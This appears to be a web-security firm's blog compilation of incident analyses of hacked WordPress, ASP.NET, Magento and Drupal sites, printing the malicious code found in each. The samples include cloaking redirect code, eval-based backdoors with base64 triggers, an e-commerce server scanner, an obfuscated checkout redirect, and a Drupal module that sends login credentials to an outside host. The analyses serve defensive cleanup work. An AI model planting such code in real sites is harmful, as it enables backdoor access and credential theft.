Category: Uncategorized

Sharing spam content and getting blacklisted is not a matter of choice when a website is hacked, these are just some of the consequences when attackers compromise a blog/website and that is why it is so important to have security measures/policies in place to prevent such issues from happening.

An attacker can use a hacked website for various purposes, such as:

• Node to DDoS attacks
• Host phishing content
• Steal sensitive information
• SEO Spam and much more

Most of the time, website owners are unaware of such activities until they get a complaint from a user or a search engine (Blacklist Screen) which at that point it’s too late.

Recently our incident response team investigated a case where an infected website was redirecting users to non intended domains such as:

• "windows7keyonsale.com/windows-8-c-9.html"
• "allsoftwaredownload.com/windows-8-1-product-key-generator/"

Upon further analysis, we detected that one of the WordPress core files was changed and a malicious content was injected at the top of the file "wp-includes/template-loader.php"

<?php$tmp = strtolower($_SERVER['HTTP_USER_AGENT']);    $mysite = "hxxp://www.infectedwebsite.com/";         $filename = "";   $fromsite = "hxxp://allsoftwaredownload.com/windows-8-1-product-key-generator/";  if (strpos($tmp, 'google') !== false || strpos($tmp, 'yahoo') !== false || strpos($tmp, 'aol') !== false || strpos($tmp, 'sqworm') !== false || strpos($tmp, 'bot') !== false) {    $ksite = !empty($_GET['win']) ? $_GET['win'] : "";   $list = array();    $listname = $filename . "?win="; $liststr = "<div style='text-align: center'>";  foreach ($list as $key => $val) {       if ($ksite == $key) {           $fromsite = $val;       }       $liststr .= "<a href='" .$mysite .  $filename . "?win=" . $key . "'>" . $key . "</a>&nbsp;&nbsp;";  }   $liststr .= "</div>";   $url = empty($_GET['key']) ? "" : $_GET['key'];  if(function_exists('curl_init')){$s = curl_init();curl_setopt($s,CURLOPT_URL,$fromsite . $url);curl_setopt($s,CURLOPT_RETURNTRANSFER,1);curl_setopt($s,CURLOPT_USERAGENT,'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');curl_setopt($s,CURLOPT_REFERER,"http://www.google.com");curl_setopt($s, CURLOPT_HTTPHEADER, array('X-FORWARDED-FOR:66.249.72.240', 'CLIENT-IP:66.249.72.240'));$content = curl_exec($s);}else{$content=file_get_contents($fromsite . $url);}...

In addition to loading the content from the offending website (image below) and displaying it to the user, the injection also attempts to avoid detection from Search Engines in order to increase profitability.

This is another example where attackers modify core files from the CMS to perform malicious activities. If you have a file integrity monitoring in place and a backup, this could be easily avoided and reverted to a good state. It’s also important to double-check the logs and find the entry point to avoid that from happening again. Using a Web Application Firewall and changing passwords are good prevention measures.

We often find code that is developed with good intent but the security aspects of it are not always taken into consideration.

During a routine cleanup investigation we found a php script in a theme that used mail capabilities without any type of security check or direct access prevention. Because of that, attackers would be able to abuse such features and send mass SPAM.

This script is part of one premium WordPress theme and here is a snippet of it (with comments removed):

$to = htmlspecialchars( stripslashes( trim( $_POST['To'] ) ) );$name = htmlspecialchars( stripslashes( trim( $_POST['Name'] ) ) );$email = htmlspecialchars( stripslashes( trim( $_POST['Email'] ) ) );$message = htmlspecialchars( stripslashes( trim( $_POST['Message'] ) ) );$subject = htmlspecialchars( stripslashes( trim( $_POST['Subject'] ) ) );$headers = 'From: '. $name .' <'. $email .'>';//$subject .= ', from: ' .$name ;if( @mail( $to, $subject, $message, $headers ) ){    echo json_encode( array(        'status' => 'ok' ));   } else {  echo json_encode( array(        'status' => 'error'  ));   }

As you can see, it sends emails using the data provided in POST parameters. And although it is meant to work as a part of the theme, it can be easily used as a stand-alone script bypassing all security checks made in other theme files.

This theme is not the only one that has such a vulnerability. If you develop themes / plugins and they include files that shouldn’t be used outside of the original theme or plugin, consider this trick to prevent direct access to the files. The following code can be added at the top of the files after the php tags:

if ( basename($_SERVER['PHP_SELF']) == basename(FILE) ) {  die('Access Denied'); }

This post demonstrated just one of many security issues that could be caused by poor coding practices. Extension developers should alway remember that if their software becomes even moderately popular hackers immediately start looking for ways to abuse it.

Spammers are constantly looking for ways make use of resources of hacked sites in their black hat SEO schemes. In most cases, spam injections and doorway script are quite hard to detect but in this example attackers didn’t worry much about that aspect.

The technique consists of abusing server resources (storage and database) by installing spammy WordPress sites (Oakley and Ray Ban spam in our case) in subdirectories of the original site and providing additional scripts to automate WordPress management (they probably don’t know about the XML-RPC API).

During our investigation, we identified common patterns between different infected websites with this type of injection.

• 1. The attackers added 2 directories in the root (./oakleyer and ./raybaner) with WordPress installations (v4.0.12)
• 2. Attackers took the database credentials from the original site’s wp-config.php, and used different table prefixes for the spammy WordPress sub-sites.
• 3. There were also four specific files that helped automate blog management in both ./oakleyer/wp-admin and ./raybaner/wp-admin:
  • etchk.php - verifies if there is a post in the database with a given title.
  • etpost.php - creates or updates spam posts in the database.
  • etreply.php - posts comments.
  • map.php - creates sitemaps for the SPAM sub-sites.

If you see unrelated search queries in Google Search Console or the [site:you-site-domain-here.com cheap] search returns pages that don’t belong to your site, it’s a strong indication of a SEO hack.

In this case, it was easy to notice the malicious directories in the site root. You still need to regularly log in and visually inspect the directory structure. A more reliable approach is integrity monitoring of your server file structure or whole security monitoring solutions.

Backdoors can be simple and powerful at the same time. They’re also very common to be seen along with any kind of infection so that an attacker can get unauthorized access to the server and, although you try to clean the whole malicious content from your website, they can be used to reinfect it again and again.

Here is a small example of an ASP.NET backdoor in a website running on IIS:

<script runat="server" language="JScript">function popup(str) {var q = "u";var w = "afe";var a = q + "ns" + w;var b= eval(str,a);return(b);}</script>

The code above executes whatever command you pass as argument through the str parameter. Note that the eval function is using a second parameter, which is "unsafe”, so the eval method can be executed in the same security context as the calling code.

The code above doesn’t do much alone. The declared popup function must be used somewhere. Indeed, if you scroll down the file you will see a small piece of code trying to hide itself

popup(popup(System.Text.Encoding.Default.GetString(System.Convert.FromBase64String(&quoteUmVxdWVzdC5JdGVtWyJzeW15aGsiXQ=="))));

You can see that the popup function is being called twice. The inner call retrieves the value of the symyhk request parameter ( Request.Item["symyhk"] is the base64 encoded part). The outer call executes the code passed in the symyhk parameter.

This technique is used to reinfect ASP websites and, in the case where we got this code from, the main default.asp was being overwritten with spam. No matter how many times the default.asp was restored, the malicious code would reappear in the file until the backdoor was removed. If you need help cleaning it up and protecting your website, let us know.

We see a strong trend in hacking ecommerce sites in order to hijack payment process and steal customers credit card details. During the last couple of years, we wrote multiple times about attacks that target Magento, OpenCart, PrestaShop, Woo Commerce and other ecommerce platforms.

Recently we found one more proof of increased attention to ecommerce sites from hackers. On one hacked WordPress site, among other uploaded backdoors, we found quite a big script (>600 lines of code) script whose only purpose was to scan the compromised server for online shop sites

$start_from = ReqParamPost('start');$last       = ReqParamPost('last');$sca = new ShopSearcher( AbsDir(), 10, $start_from, $last, 9.0, 25 );$ret = $sca->Scan();echo MakeResponseStr($ret);

This script scans the server account for file patterns of known ecommerce platforms and then displays paths and types of the found online stores. The current version of the script detects the following 11 platforms:

• 1. OpenCart
• 2. osCommerce
• 3. Magento
• 4. PrestaShop
• 5. ZenCart
• 6. CS-Cart
• 7. WooCommerce
• 8. WP Marketplace plugin
• 9. X-Cart
• 10. Interspire Shopping Cart
• 11. WP Checkout plugin

Interesting enough, for Woo Commerce sites this script also checks the number of registered users and if the number is lower than 200, the site doesn’t make it in the list of found ecommerce sites.

$nu = WPDB_QueryNumUsers($fn_wp_config);            if ( $nu >= 200 ){    $this->mFoundShit []= array(6, $pAbsFile);}else{    LogAdd("Ignoring WOO-COMMERCE.. Not enough users ($nu)");}

If you own an ecommerce site, the site security should be one of your priorities. If it is hacked, virtually nothing can stop hackers from stealing your customer’s payment details (especially if you hast payment forms on your own site). We always advised against hosting different sites under the same hosting account as this setup leads to infection of all the sites if only one of them has a security hole. This ShopSearcher script once again proves that you should isolate your ecommerce site from your rest sites. Proper isolation will reduce the attack surface and even if the site gets hacked, the subsequent cleanup and hardening will be much easier.

The checkout process is one of the most important steps for any e-commerce business. The user experience during this process will set the tone for the entire interaction and fortunately lead to a successful sale. Because of that fact, attackers have been targeting Magento installations in order to steal sensitive information (credit card data, paypal logins) and in this case, promote websites for their monetary gains.

During our malware investigation process, we found an interesting piece of code redirecting users during the checkout process to a page not intended by the website owner. After selecting the products and clicking on the “Proceed to checkout” the user was redirected to: hxxp://bestdealsweek[.]com

The malicious code was located inside "/js/varien/accordion.js" and here is the content (obfuscated):

var x="'%kVg'%YZaVn'%(9'%&%%(7%6'%'%hZiI^bZdji'-''YdXjbZci#adXVi^dc#]gZ[(9',]iie(6$$WZhiYZVahlZZ`#Xdb','''8'%YZaVn'.(7",y="",w="",z;z=x['length'];
for(i=0;i<z;i++){y+=String'fromCharCode' }w=this'unescape';this'eval';

This particular file in addition to "/skin/frontend/base/default/js/opcheckout.js" create a Javascript Layer responsible for submitting step data to the checkout controller and interpreting controller responses to update the content of the checkout steps. This layer allows the checkout process to be completed without the browser having to load every request in a new page.

This is how the accordion.js was injected into the One Page checkout:

<script type="text/javascript"src="hxxps://domain/js/varien/accordion.js"></script> 

After decoding it, we can see the redirect:

var delay = 100;setTimeout("document.localtion.href='hxxp://bestdealsweek.com'",delay);

This is one of the many injection techniques attackers have been using against Magento e-commerce sites to make a profit. To reduce the risks of such injections, we recommend keeping all software updated (themes, plugins, core files), using a Website Application Firewall, having a File Integrity Monitoring system to detect file modifications and taking regular backups.

We recently wrote about a Drupal black-hat SEO hack that among other things redirected users coming from Google to botscache[.]com site. It hijacked the bootstrapping process via the session_inc variable in database, then made Drupal load a malicious file from the global /tmp directory instead of the standard includes/session.inc file.

This malware evolves and we have found its new variation. Again, the only malicious code that could be found within the site structure was just a file name. This time it was in the system table and it was the name of the file to load a Drupal module from. However, the file had a .jpg extension and it was loaded from a directory that belonged to a different website under the same server account ../otherwebsite/sites/default/files/slides/Search.jpg.

Taking a look at that Search.jpg file we can see the following code:

pre>if(isset($_POST["gbdc"])){@'val($_POST["gbdc"])', 'add');exit;}function drupal_get_urlsc_callback_url($url) { ... return $file_contents; }if(isset($_POST['op'])&&$_POST['op']=='Log in'){ ... if(user_authenticate(@$_POST['name'],@$_POST['pass'])){ $args_result_url=base64_decode("aHR0cDovLzB4MHguY28vcC5waHA/dT0=").base64_encode(@$_POST['name']); $args_result_url.="&p=".base64_encode(@$_POST['pass'])."&url="....; drupal_get_urlsc_callback_url($args_result_url); }}if(empty($_COOKIE) && preg_match('/.google.|.aol.com|.ask.com/i',@$_SERVER["HTTP_REFERER"])) { header("location:http://botscache[.]com/n.php?".$_SERVER["HTTP_HOST"]....); exit;}if(empty($_COOKIE) && $_SERVER["REQUEST_URI"]=='/google4a4791b250e72fd1.html'){ echo 'google-site-verification: google4a4791b250e72fd1.html'; exit;}

The functionality is pretty much the same: backdoor to execute arbitrary code, botscache[.]com redirection of the search engine traffic (Air Jordan replica spam) and malicious Google Search Console verification. However, this variation also add the functionality to steal Drupal credentials. When someone submits a login form, the malicious module verifies that the credentials are valid and sends them to their own site 0x0x[.]co (the domain name is base64-encoded).

This Drupal malware demonstrates that infection is not always limited to the site itself. You may not find anything suspicious if you scan only the site directory. The actual malware may be anywhere on the server: in publicly writable directories like /tmp and /var/tmp, inside neighbor sites that share the same server account, etc. If one of your sites is hacked, don’t limit the cleanup to this site only. You should always scan all the sites you have on the same server - all the sites may be infected and some of them may have backdoors and malicious files lurking, leading to recurring infections.

This infection also reminds us about the importance of changing passwords after every site hack. It’s always a good idea to restrict access to CMS admin area. Two factor authentication and/or IP whitelist will stop hackers even if they managed to steal your credentials. You can do it on your own server or place your site behind a website firewall and have it block unwanted logins.